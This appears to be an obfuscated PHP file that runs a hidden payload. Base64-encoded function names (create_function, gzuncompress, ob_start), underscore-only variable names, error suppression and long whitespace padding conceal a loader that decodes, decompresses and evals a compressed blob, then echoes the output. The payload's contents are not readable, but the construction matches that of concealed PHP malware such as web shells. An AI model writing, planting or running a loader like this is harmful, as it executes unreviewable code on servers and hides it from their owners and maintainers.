<?php 
 error_reporting(0);
        $__='printf';$_='Loading the  ...';
        



































































































        $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='Q1JFQXRlX2Z1bkNUaU9u';
                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrt2kFvokAUB/C7yX4HDk3GJo0ZoNYYwgXtIDShEXUYuDTOYLU6oFm2Bf30naJb12w2abO9rPt+JBqceT74k8zBUdP2Lh4UG22+P+U/HpFVnx7YSOvJaVG0Wi1kNQ7ztW+Ncz4abwFoX8j+7RMUm76MWSgZTuh4FUxGk+49qoeOKX/I4WHZGgAAnCckMopT5j97LjXiqFz7pPvItqvOftFUq2a9EEJQAAAAAAAA/GvgxwwAADhfiE+L2c31QzoT63SGLEgEAAAA+Cun+/f94TroZe0Fj+hOuGSZjBxHDBwxGoRYkKrPjTYWWbfgLt2KXRH05vguZYH0bkmpxglnTsFNKZOxGsvp7mf92PRXCfM6/eFGF8ZkPoqqIo30Dc8ITmjlpYOwZMSXglEpzOGf5o1T5pTc9DG7TRaxQdR3BmLIKJ723/v53K10HsnnesecBLrq/yLyUIQZWcZRKIVeeTEL1vclvlN9ltwlO7F1jtc+CV54Hm65URXqmucJW+Akaq/UnJP7V7WdOq8cqxxsG31yM/5LnptdvzcPZ5fWZ8p/qf1I4cWxYRO9vaKr97b/y589TrNonoS/j+LSegWuVrBQ';
        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































                                                                                                                                                                                                                     $________;